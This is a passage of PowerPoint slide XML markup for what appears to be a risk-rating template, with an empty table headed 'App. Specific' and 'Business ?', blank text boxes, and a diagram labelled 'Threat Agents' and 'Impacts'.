        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr userDrawn="1">
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1934264512"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957457"/>
          <a:ext cx="6836400" cy="2102203"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1396800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1404000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1011600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="554203">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="288000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>App. Specific</a:t>
                      </a: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000" b="1" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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000" b="1" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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000" b="1" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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000" b="1" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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ts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>?</a:t>
                      </a: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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1260000">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10800" y="6372000"/>
            <a:ext cx="3383280" cy="2761200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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ts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10800" y="3132000"/>
            <a:ext cx="3383280" cy="3168000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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ts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463200" y="3132000"/>
            <a:ext cx="3383280" cy="3168000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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ts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6534000" y="108000"/>
            <a:ext cx="252000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="25400" cap="rnd" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="83276B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="none"/>
        </p:style>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="36000" tIns="45720" rIns="36000" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="r" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="10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3201FDD2-27F9-4966-B34E-DF3AF7EF0736}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4A1647"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4A1647"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Gruppieren 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="24248" y="1044000"/>
            <a:ext cx="6071752" cy="388200"/>
            <a:chOff x="24248" y="1044000"/>
            <a:chExt cx="6071752" cy="388200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="24248" y="1044000"/>
              <a:ext cx="6071752" cy="388200"/>
              <a:chOff x="24248" y="1056343"/>
              <a:chExt cx="6071752" cy="388200"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1056343"/>
                <a:ext cx="609600" cy="386519"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 25000"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="1">
                <a:schemeClr val="accent1"/>
              </a:lnRef>
              <a:fillRef idx="2">
                <a:schemeClr val="accent1"/>
              </a:fillRef>
              <a:effectRef idx="1">
                <a:schemeClr val="accent1"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:schemeClr val="dk1"/>
              </a:fontRef>
            </p:style>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="950" b="1" dirty="0">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Impacts</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="493228" y="1105375"/>
                <a:ext cx="139700" cy="305289"/>
                <a:chOff x="131" y="1565"/>
                <a:chExt cx="288" cy="625"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="28" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="179" y="1565"/>
                  <a:ext cx="192" cy="193"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050" algn="ctr">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="275" y="1757"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="30" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="131" y="1997"/>
                  <a:ext cx="144" cy="193"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="31" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="275" y="1997"/>
                  <a:ext cx="144" cy="193"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="32" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="131" y="1853"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="24248" y="1079143"/>
                <a:ext cx="484949" cy="297517"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="36000" rIns="36000">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="950" b="1" dirty="0">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Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="950" b="1" dirty="0">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br>
                <a:r>
                  <a:rPr lang="en-US" sz="950" b="1" dirty="0">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Agents</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1143000" y="1076806"/>
                <a:ext cx="838200" cy="357187"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 20889"/>
                  <a:gd name="adj2" fmla="val 24667"/>
                  <a:gd name="adj3" fmla="val 34667"/>
                  <a:gd name="adj4" fmla="val 80130"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
